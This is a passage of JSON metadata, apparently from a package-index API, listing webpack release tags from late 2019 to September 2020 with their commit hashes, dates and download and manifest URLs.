526","kind":"tag","published_at":"2020-09-30T08:48:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.3/manifests"},{"name":"v5.0.0-rc.2","sha":"d49b49ddebc6c06703e19ff6391915d2b09b0f2b","kind":"tag","published_at":"2020-09-29T18:49:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.2/manifests"},{"name":"v5.0.0-rc.1","sha":"f60db1a079c7df48400637c54c547c161ed189da","kind":"tag","published_at":"2020-09-28T19:18:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.1/manifests"},{"name":"v5.0.0-rc.0","sha":"658209c253287de9edee85293d23123d5183a873","kind":"tag","published_at":"2020-09-20T21:11:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.0/manifests"},{"name":"v5.0.0-beta.33","sha":"dd3ec4f8072605479410ee7c13cb7a12688939d1","kind":"tag","published_at":"2020-09-20T21:10:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.33","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.33","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.33","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.33","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.33/manifests"},{"name":"v5.0.0-beta.32","sha":"e81882adb2ca1a3cceb3dc28d4f73c09f013eb83","kind":"tag","published_at":"2020-09-18T18:08:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.32","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.32","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.32","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.32","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.32/manifests"},{"name":"v4.44.2","sha":"2efeb4b5787e868e69233aa9dec469c200fa3b2c","kind":"tag","published_at":"2020-09-17T23:43:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.2/manifests"},{"name":"v5.0.0-beta.31","sha":"ea492a530f83b35346986c374f8394814f187eb8","kind":"tag","published_at":"2020-09-17T13:43:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.31","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.31","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.31","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.31","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.31/manifests"},{"name":"v5.0.0-beta.30","sha":"922c95e9b458e44b999aca2c45d9540079a225b2","kind":"tag","published_at":"2020-09-11T21:55:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.30","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.30","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.30","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.30","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.30/manifests"},{"name":"v5.0.0-beta.29","sha":"7bc3a031996d17d859d7a5b077ce1c5ab5dc7e29","kind":"tag","published_at":"2020-08-28T19:21:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.29","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.29","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.29","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.29","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.29/manifests"},{"name":"v5.0.0-beta.28","sha":"e32daa9be5fed184c8befac87216a88872f7df4a","kind":"tag","published_at":"2020-08-20T09:42:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.28","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.28/manifests"},{"name":"v5.0.0-beta.27","sha":"3cdff531d77ee63251a385e3b6e3ccca2ec37a64","kind":"tag","published_at":"2020-08-19T20:58:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.27","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.27/manifests"},{"name":"v5.0.0-beta.26","sha":"f2b68e0b77a3b4199c0d6989eeb69bd9a0bdb2ed","kind":"tag","published_at":"2020-08-14T19:06:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.26","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.26/manifests"},{"name":"v5.0.0-beta.25","sha":"377348be6c32895a3d440b3643963f71c730aa85","kind":"tag","published_at":"2020-08-10T14:13:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.25","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.25/manifests"},{"name":"v5.0.0-beta.24","sha":"bcc93305d8558285d30ea7142517491c3cdfd46c","kind":"tag","published_at":"2020-08-05T12:29:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.24","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.24/manifests"},{"name":"v5.0.0-beta.23","sha":"a14f073b358a9391dc70e791b6309adcdc21ec79","kind":"tag","published_at":"2020-08-02T05:08:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.23","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.23/manifests"},{"name":"v4.44.1","sha":"cd4af164784f3938353102179adfcbcf8f53949d","kind":"tag","published_at":"2020-07-30T08:02:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.1/manifests"},{"name":"v4.44.0","sha":"d4603c6d7ef4acfbe956ef49d8476c7368526989","kind":"tag","published_at":"2020-07-24T17:13:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.0/manifests"},{"name":"v5.0.0-beta.22","sha":"00226ff3de02078c641ef0426a5425c184510b8a","kind":"tag","published_at":"2020-07-09T11:51:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.22","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.22/manifests"},{"name":"v5.0.0-beta.21","sha":"20ba3c07803a3fd580755937016f0d5c85c1ccd3","kind":"tag","published_at":"2020-07-06T21:18:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.21","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.21/manifests"},{"name":"v5.0.0-beta.20","sha":"8efea230e05561fbaf3f9872e01affcac399cb3a","kind":"tag","published_at":"2020-06-29T16:29:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.20","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.20/manifests"},{"name":"v5.0.0-beta.19","sha":"3347fa1cee621c7f684b25507fdaed3264e8dcd9","kind":"tag","published_at":"2020-06-29T15:19:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.19","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.19/manifests"},{"name":"v5.0.0-beta.18","sha":"5c9fdeb9e1158a45de2350a7e858f550d73adf55","kind":"tag","published_at":"2020-06-17T23:25:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.18","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.18/manifests"},{"name":"v5.0.0-beta.17","sha":"a0716cf6bc074ec0d21fe72120cda103dabf8f9a","kind":"tag","published_at":"2020-06-03T07:21:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.17","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.17/manifests"},{"name":"v5.0.0-beta.16","sha":"b7f08b42b85f89e52facac426251d26ec64f2e6d","kind":"tag","published_at":"2020-05-05T22:03:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.16","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.16/manifests"},{"name":"v4.43.0","sha":"c9d4ff7b054fc581c96ce0e53432d44f9dd8ca72","kind":"tag","published_at":"2020-04-21T14:24:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.43.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.43.0/manifests"},{"name":"v5.0.0-beta.15","sha":"4c7e5e667bd30affa2e8c3bc8c65fd38e90912fe","kind":"tag","published_at":"2020-04-21T12:06:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.15","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.15/manifests"},{"name":"v4.42.1","sha":"71eb5931dbd7db125109a95692065333cea936a9","kind":"tag","published_at":"2020-03-24T06:23:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.42.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.1/manifests"},{"name":"v5.0.0-beta.14","sha":"59f8dc824ec169252476fa5b476e14c95f7bda40","kind":"tag","published_at":"2020-03-02T16:32:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.14","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.14/manifests"},{"name":"v4.42.0","sha":"29d851bf6d1e5d59eafb688d51396e70d12057c9","kind":"tag","published_at":"2020-03-02T08:41:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.42.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.0/manifests"},{"name":"v4.41.6","sha":"71be3bfa45a55aa8ea1b954ab1302565bb073bbc","kind":"tag","published_at":"2020-02-11T10:16:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.6","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.6/manifests"},{"name":"v5.0.0-beta.13","sha":"8445f06fa9abac1c98e6057af1c1fd2de63babbd","kind":"tag","published_at":"2020-01-29T21:23:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.13","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.13/manifests"},{"name":"v5.0.0-beta.12","sha":"228c1caaaff0938be2792cd516e5171cc2ce5e49","kind":"tag","published_at":"2020-01-16T00:09:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.12","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.12/manifests"},{"name":"v4.41.5","sha":"45ecebc9f0486c43efc7b56f2c31426d94a55264","kind":"tag","published_at":"2019-12-27T21:09:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.5/manifests"},{"name":"v5.0.0-beta.11","sha":"3e3b7a2e363dc7746cbde1abbfa188e8aa7f1dea","kind":"tag","published_at":"2019-12-24T07:28:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.11","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.11/manifests"},{"name":"v5.0.0-beta.10","sha":"bd21c4d04f15d54f3a8233b742aebdd4b62bb9c2","kind":"tag","published_at":"2019-12-22T00:06:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.10","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.10/manifests"},{"name":"v4.41.4","sha":"dcc45dd977356f08061b2e9451792c6218910891","kind":"tag","published_at":"2019-12-19T07:28:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.4/manifests"},{"name":"v4.41.3","sha":"df9f3eb7d9e4e60e53bfd1595d857bc7f912bc21","kind":"tag","published_at":"2019-12-16T09:33:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.3/manifests"},{"name":"v5.0.0-beta.9","sha":"3ae73b62326e12546949e1d21db25b93b064e81b","kind":"tag","published_at":"2019-12-08T21:50:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.9/manifests"},{"name":"v5.0.0-beta.8","sha":"9ffda5aee96a6456a2cfe11853d2a0bf5118c7cb","kind":"tag","published_at":"2019-12-08T21:44:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.8/manifests"},{"name":"v5.0.0-beta.7","sha":"697ebe81e13681093e9e643986e5011e0aa3a398","kind":"tag","published_at":"2019-11-20T21:51:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.7/manifests"},{"name":"v5.0.0-beta.6","sha":"de1e11b0b5209440a2992eb4ed7dd2ec30391c8f","kind":"tag","published_at":"2019-11-14T21:54:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.6/manifests"},{"name":"v5.0.0-beta.5","sha":"85145cebf3ed50014b36e76047681bbb066bbe1f","kind":"tag","published_at":"2019-11-13T13:32:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.5/manifests"},{"name":"v5.0.0-beta.4","sha":"f6f5364ad18fcf1b5a33e66d3350d6809ddb03e4","kind":"tag","published_at":"2019-11-12T18:09:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.4/manifests"},{"name":"v5.0.0-beta.3","sha":"43afd3d8ee53eb31a61ac78d4bfe067cd63a7fab","kind":"tag","published_at":"2019-11-06T00:09:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz